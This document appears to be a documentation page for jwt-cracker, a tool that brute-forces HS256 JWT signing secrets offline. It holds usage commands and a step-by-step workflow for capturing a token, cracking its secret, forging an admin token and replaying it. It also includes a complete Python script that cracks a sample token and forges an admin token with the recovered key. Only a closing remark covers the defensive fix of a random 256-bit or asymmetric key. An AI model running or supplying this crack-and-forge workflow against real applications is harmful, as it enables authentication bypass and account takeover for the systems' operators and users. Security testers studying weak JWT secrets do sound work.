Description
jwt-cracker brute-forces the HMAC secret of HS256-signed JWTs offline: it recomputes the signature for every candidate string over a chosen alphabet up to a maximum length and stops when one matches the token's signature. Because the work is done locally against a captured token, no requests reach the target and no rate limiting or lockout applies; success depends only on the secret being short enough to enumerate. A recovered secret lets you mint tokens with any claims you like (role, subject, expiry) that the application will accept as genuine, which is normally an authentication or authorization bypass.
Installation
BASH
npm install -g jwt-cracker
Basic Usage
BASH
# Crack the secret with the defaults: alphabet a-zA-Z0-9, max length 12.
# This is the 1.x positional syntax (token, alphabet, max length); 2.x releases switched
# to flags, so run `jwt-cracker --help` to confirm the syntax of your installed version.
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
# Note: that token is the jwt.io demo token. Its secret ("your-256-bit-secret") is 19 characters
# and contains '-', which is not in the default alphabet, so this run can never hit; treat it as
# a syntax example only and expect no result.
Advanced Usage
BASH
# Custom character set. Always pass a max length as well: if the third argument is omitted
# the default of 12 applies, and 36^12 candidates will not finish in any useful time.
jwt-cracker "TOKEN" "abcdefghijklmnopqrstuvwxyz0123456789" 6
# Longer max length (much slower: 26^8 is roughly 2e11 HMAC computations)
jwt-cracker "TOKEN" "abcdefghijklmnopqrstuvwxyz" 8
# Mixed case, digits and a few symbols. Single quotes keep '!' and '$' away from the shell;
# in double quotes, '!@' can trigger history expansion in an interactive bash.
jwt-cracker "TOKEN" 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$' 6
# Rule of thumb: the keyspace is about |alphabet|^maxLength. Pure brute force is only realistic
# for very short secrets; for anything longer, use a wordlist with hashcat (-m 16500, JWT) instead.
Common Workflows
BASH
# Step 1: Capture a JWT from the "Authorization: Bearer ..." header or a session cookie
TOKEN="<paste token here>"
# Step 2: Decode the header and confirm "alg":"HS256" (jwt-cracker only handles HS256).
# JWT segments are base64url without padding, so map '_-' to '/+' before base64 -d;
# stderr is silenced because GNU base64 complains about missing padding but still decodes.
echo "$TOKEN" | cut -d. -f1 | tr '_-' '/+' | base64 -d 2>/dev/null; echo
# Step 3: Brute-force the secret with an alphabet and max length you can afford
jwt-cracker "$TOKEN" "abcdefghijklmnop0123456789" 6
# Step 4: If the secret is recovered, forge tokens: decode the payload, change the claims
# (role to admin, another user ID, a later exp), and re-sign with the cracked secret using
# the jwt.io debugger or PyJWT (pip install PyJWT; import jwt; jwt.encode(claims, secret, algorithm="HS256")).
# Replay the forged token against the application to confirm it is accepted.
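The brute force described under Basic and Advanced Usage, and the decode/crack/forge workflow above, as one added, self-contained Python example. This is not jwt-cracker's code and not from the original page; it uses only the standard library and mirrors what the tool does (enumerate every string over an alphabet up to a max length, recompute HMAC-SHA256, compare). The sample token, its 3-character secret "s3c" and the alphabet are constructed for the demonstration; `PAGE_TOKEN` is the jwt.io demo token quoted on this page and is only used to show the header check.

```python
"""Added example: decode a JWT header, check the algorithm, brute-force an HS256
secret the way jwt-cracker does, then forge a token with the recovered key.
Standard library only. SAMPLE_* values and ALPHABET are constructed for the demo."""
import base64
import hashlib
import hmac
import itertools
import json
import time


def b64url_encode(data: bytes) -> str:
    # JWT segments are base64url with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Re-add the padding the token omits, otherwise the decoder rejects the input
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Build header.payload.signature exactly as an HS256 issuer would."""
    compact = {"separators": (",", ":")}
    signing_input = (b64url_encode(json.dumps(header, **compact).encode()) + "."
                     + b64url_encode(json.dumps(payload, **compact).encode()))
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def header_alg(token: str) -> str:
    return json.loads(b64url_decode(token.split(".")[0])).get("alg")


def payload_claims(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, alphabet: str, max_len: int):
    """Return the secret if found, else None. Shortest candidates first, like jwt-cracker."""
    if header_alg(token) != "HS256":
        raise ValueError("only HS256 tokens can be brute-forced this way")
    signing_input, sig_b64 = token.rsplit(".", 1)
    target = b64url_decode(sig_b64)
    msg = signing_input.encode()
    for length in range(1, max_len + 1):
        for cand in itertools.product(alphabet, repeat=length):
            secret = "".join(cand).encode()
            if hmac.compare_digest(hmac.new(secret, msg, hashlib.sha256).digest(), target):
                return secret.decode()
    return None


def forge_admin(token: str, secret: str) -> str:
    """Step 4 of the workflow: keep the header, rewrite claims, re-sign with the cracked key."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    payload = payload_claims(token)
    payload["role"] = "admin"
    payload["exp"] = int(time.time()) + 365 * 24 * 3600
    return sign_hs256(header, payload, secret)


def verify_hs256(token: str, secret: str) -> bool:
    """What the target server does: recompute the signature and compare in constant time."""
    signing_input, sig_b64 = token.rsplit(".", 1)
    expected = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


# Constructed sample: a token signed with the weak 3-character secret "s3c"
SAMPLE_SECRET = "s3c"
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                          {"sub": "1001", "role": "user"}, SAMPLE_SECRET)
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
# The jwt.io demo token quoted on this page, used only for the header check
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpva"
              "G4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c")

if __name__ == "__main__":
    print("page token alg:", header_alg(PAGE_TOKEN))
    found = crack_hs256(SAMPLE_TOKEN, ALPHABET, 3)  # 36 + 36^2 + 36^3 = 47,988 candidates
    print("recovered secret:", found)
    forged = forge_admin(SAMPLE_TOKEN, found)
    print("forged claims:", payload_claims(forged))
    print("server accepts forged token:", verify_hs256(forged, SAMPLE_SECRET))
```

The 47,988 candidates for a 3-character alphanumeric secret take well under a second; the same loop at the tool's defaults (62 characters, length 12) is about 3e21 candidates, which is why jwt-cracker only ever succeeds against trivially short secrets and why the fix on the defending side is a randomly generated key of at least 256 bits (or an asymmetric algorithm), not a longer password.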